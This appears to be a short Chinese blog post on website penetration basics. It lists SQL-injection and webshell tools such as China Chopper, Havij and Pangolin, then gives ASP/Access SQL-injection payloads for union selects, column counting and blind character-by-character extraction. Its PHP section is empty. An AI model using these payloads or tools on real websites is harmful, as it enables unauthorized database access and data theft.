当前位置: 首页 > article >正文

网站渗透常识

article 2024/10/27 1:00:45

asp漏洞最多,php其次,jsp最少

asp一般搭配access数据库

php一般mysql数据库

 

工具

        啊D注入工具

        明小子

        御剑

        中国菜刀

        穿山甲

        Havij1.15

        Nbsi

        网站猎手

        红黑注入工具

        wwwscan

        JSky

        Pangolin

        

ASP语句构造注入

        id=*** or 1=1

        id=*** and exists (select count(*) from 表名)  需要先猜解到表名

        id=*** and 1=2 union select 1,2,3,4.... from 表名  需要先猜解表情和对应的查询字段数量

        and 1=1 返回正常
        and 1=2 返回错误
        and exists (select count(字段名)from 表名 )
        order by  数字    判断表有多少列
        and 1=2 union select 数字 from 表名
        and (select top 1 len(字段名) from 表名)>0  查询长度
        and (select top 1 asc(mid(字段名,N,1)) from 表名)>0  查询ASCII码

PHP手工注入

        

插入注入

        

 

 

 


http://www.kler.cn/news/366577.html

相关文章:

  • opencv学习笔记(1):基础知识
  • 在多数据中心环境中,自动化运维如何保证跨区域的一致性?网络延迟导致的数据不一致是否可以完全避免?|自动化运维|跨区域一致性
  • 三国杀钓鱼自动化
  • AI 是如何进行混合检索
  • MySql中的锁的分类
  • 2024年全球 MoonBit 编程创新赛-零基础早鸟教程-使用wasm4八小时开发井子棋小游戏
  • Modern CMake 简明教程(8)- 集成Qt
  • lua while循环
  • Linux -- 共享内存(2)
  • 机器学习4
  • ESC服务器被暴力破解如何解决
  • Redis 主从同步 总结
  • 【大数据技术基础 | 实验五】ZooKeeper实验:部署ZooKeeper
  • LDAP 部署手册
  • 每日一题——第一百一十九题
  • 多线程——线程池
  • 数据安全领域的分类分级管理
  • 教学平台的信息化设计:Spring Boot实践
  • 光储充微电网:策略调度带领能源新未来---安科瑞 吴雅芳
  • 四,Linux基础环境搭建(CentOS7)- 安装Zookeeper
  • 【电商搜索】现代工业级电商搜索技术-亚马逊-经典的Item-to-Item协同推荐算法
  • 实验03分支---7-7 用天平找小球
  • Vue3 学习笔记(四)Vue3 入口文件之间的关系和流程
  • 面向对象与设计模式第一节:深入理解OOP
  • 使用IIS搭建PHP环境时遇到404错误怎么办?
  • 随笔—git操作